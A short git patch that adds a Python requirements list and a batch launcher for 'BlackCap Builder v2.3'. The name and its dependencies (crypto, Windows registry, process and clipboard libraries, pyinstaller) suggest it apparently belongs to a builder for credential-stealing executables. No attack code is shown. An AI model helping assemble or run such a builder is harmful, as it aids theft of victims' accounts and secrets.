From 76e67d23ffd7ff32b38add5bfa8d04fa2c193ff5 Mon Sep 17 00:00:00 2001 From: SupraKSCH <127904401+SupraKSCH@users.noreply.github.com> Date: Wed, 15 Mar 2023 00:22:07 +0100 Subject: [PATCH] Add files via upload --- requirements.txt | 21 +++++++++++++++++++++ start.bat | 4 ++++ 2 files changed, 25 insertions(+) create mode 100644 requirements.txt create mode 100644 start.bat diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..f348c1b --- /dev/null +++ b/requirements.txt @@ -0,0 +1,21 @@ +httpx +pyperclip +pyotp +asyncio +winregistry +psutil +pypiwin32==223 +pycryptodome +pyinstaller>=5.0 +PIL-tools +asyncio +threaded +requests +datetime +colorama +pillow +customtkinter +pycryptodome +pyperclip +pyfiglet +tqdm \ No newline at end of file diff --git a/start.bat b/start.bat new file mode 100644 index 0000000..9f67f3e --- /dev/null +++ b/start.bat @@ -0,0 +1,4 @@ +@echo off +title BlackCap Builder v2.3 +python builder.py +pause \ No newline at end of file